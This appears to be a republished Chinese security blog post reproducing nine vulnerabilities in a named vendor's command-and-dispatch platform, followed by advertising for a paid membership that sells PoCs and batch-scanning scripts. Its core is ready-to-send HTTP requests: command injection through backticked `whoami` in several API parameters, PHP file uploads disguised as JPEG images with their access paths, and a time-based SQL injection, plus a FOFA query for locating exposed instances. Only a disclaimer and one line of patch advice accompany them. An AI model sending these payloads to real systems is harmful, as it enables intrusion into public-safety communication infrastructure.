【漏洞复现】指挥调度平台漏洞集合
2024-1-20 13:28:49 Author: 天擎攻防实验室(查看原文) 阅读量:90 收藏

 星球介绍


SCA御盾星球介绍详情请访问如下链接:

SCA御盾星球介绍

0x01 阅读须知

SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 产品描述

福建科立讯通信有限公司的指挥调度平台是一款功能强大的通信解决方案。该平台集成了语音、视频、数据等多种通信方式,可实现快速、准确的指挥调度。通过该平台,用户可以实时掌握现场情况,迅速做出决策,提高应对突发事件的能力。同时,该平台还具备高度的可扩展性和灵活性,可根据不同行业和场景的需求进行定制化开发,满足各种复杂的通信需求。在福建科立讯通信有限公司的持续研发和技术支持下,该指挥调度平台已经在多个领域得到广泛应用,为保障公共安全和企业运营提供了强有力的通信保障。

0x03 fofa语法:

app="指挥调度管理平台"

0x04 漏洞详情

1、zhihuidiaodupingtai-invite_one_ptter-rce

GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`whoami>test.txt`&force=1&timeout=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close
GET /api/client/ptt/test.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

2、zhihuidiaodupingtai-invite2videoconf-rce

GET /api/client/invite2videoconf.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

GET /api/client/test.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

3、zhihuidiaodupingtai-fileupload-file-upload

POST /api/client/fileupload.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 477
------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="file"; filename="rcnlsq.php"Content-Type: image/jpeg
5465rcnlsq------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="number";
5465------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="type";
1------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="title";
1------WebKitFormBoundaryVBf7Cs8QWsfwC82M--

4、zhihuidiaodupingtai-upload-file-upload

POST /api/client/upload.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 194
------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="ulfile"; filename="lztkkl.php"Content-Type: image/jpeg
99647lztkkl------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
GET /upload/lztkkl.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

5、zhihuidiaodupingtai-task-uploadfile-file-upload

POST /api/client/task/uploadfile.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 198
------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"Content-Type: image/jpeg
97236rvfuid------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
文件路径:响应包获取

6、zhihuidiaodupingtai-event-uploadfile-file-upload

POST /api/client/event/uploadfile.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 198
------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"Content-Type: image/jpeg
48620iuctmt------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
文件地址:响应包获取

7、zhihuidiaodupingtai-invite_one_member-rce

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close
GET /api/client/audiobroadcast/test.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

8、zhihuidiaodu-client-upload

POST /api/client/upload.php HTTP/1.1Host: User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaKContent-Length: 200
------WebKitFormBoundarymVk33liI64J7GQaKContent-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"Content-Type: image/jpeg
dzfuxvtm186448------WebKitFormBoundarymVk33liI64J7GQaK--
GET /upload/dzfuxvtm.php HTTP/1.1Host: User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: close

9、zhihuidiaodu-getusername-sqli

/api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(10)))FIjE)

0x05 修复建议

1、升级指挥调度平台至最新版本

2、官网下载最新安全补丁:https://kirisun.com

漏洞poc+漏洞批量扫描脚本发布在知识星球

明日预告:【python专题】requests请求怎么处理302跳转?

0x06 近期发布

0x07 星球近况

付费星球

以下活动不支持多项叠加

(1)近期活动:
1、老带新活动
(1)通过群里老人进入星球的新人,只需
109元进入,老人也会得到20元现金奖励。加入方式与奖励方式皆通过私聊,不支持退款
(2)星球开通分享有赏功能,通过老人分享的星球进入的新人,老人返现
25元左右,新人返现15元左右

2、知识星球发放

20张价值30元的假日优惠券,先到先得,优惠券扫顶部二维码获得

3、通过私聊进入星球的,只需135元,但不支持退款

(2)星球更新:
1、星球付费成员已满150人,正式与2023/12/25日起,进入费用涨价至
149元。

2、星球内即将推出积分玩法,具体加分细节查看星球获悉。每月初评选出上月积分榜前三名发放现金奖励,第一名获得150元,第二名获得100元,第三名获得50元,星主与管理员不参与评选。不得恶意刷屏刷积分,一经发现,取消其3个月的评比资格。发文每人每天不能超过3条,超过3条警告一次且不计积分,多次警告取消其3个月的评比资格。

3、春节,微信群发放200元红包一次,按固定时间区间内,筛选出最倒霉蛋子(即红包抢的最少的人)发放鼓励奖,春节为666元,如果同时多个人抢到最低红包且数额一样,则按数量平分鼓励奖。

(3)加入说明:

1.加入收费说明:

(1)现阶段扫码加入价格为¥149(系统支持三天退款)

(2)私聊微信加入¥135元,但不支持退款

(3)转发任意一篇SCA御盾的公众号至5个50人以上安全群,在公众号加微信后凭截图发放8折优惠券

(4)投稿最新漏洞poc或复现分析文章可免费加入1年(每星期限量5人)

2. 每逢节假日会发放一定数量优惠券

3.每天日更,工作日推送1day或0day,周末推送出货多的nday,期间不定期推送实用工具或脚本

4. 进入星球后加群可提前一天解锁第二天的发布内容

5.补天半自动化交洞脚本,计划于2024年农历新年后的第一个工作周于微信群推送,价格10-50元视服务而定


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2MzQyMjA1NA==&mid=2247484321&idx=1&sn=fad52ece5dc0d74d7de8967f9f4f3b27&chksm=fd2fc37eab64839f667fa8fe8567de222f9609f4f6a3d07bdc9ad8a9f6a70f3042c92bfdcba3&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh